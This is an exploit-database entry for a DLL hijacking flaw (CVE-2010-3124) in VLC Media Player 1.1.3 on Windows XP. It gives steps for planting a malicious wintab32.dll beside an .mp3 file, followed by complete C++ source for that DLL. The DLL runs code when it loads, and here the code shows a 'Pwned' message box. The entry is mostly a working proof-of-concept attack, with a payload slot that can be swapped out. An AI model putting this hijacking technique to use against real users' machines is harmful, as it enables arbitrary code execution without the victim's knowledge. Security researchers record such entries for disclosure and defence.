[] NeoSense

VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking

Author: Secfence
type: local
platform: windows
port: 
date_added: 2010-08-25 
date_updated: 2016-11-15 
verified: 0 
codes: CVE-2010-3124;OSVDB-67492 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comvlc-1.1.3-win32.exe

Exploit Title: VLC Player DLL Hijack Vulnerability
Date: 25 Aug 2010
Author: Secfence
Version: VLC
Tested on: Windows XP

Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in
vlc player.

Code for wintab32.dll:

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

void init() {
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

/*----------*/


Exploit By:
Vinay Katoch
www.secfence.com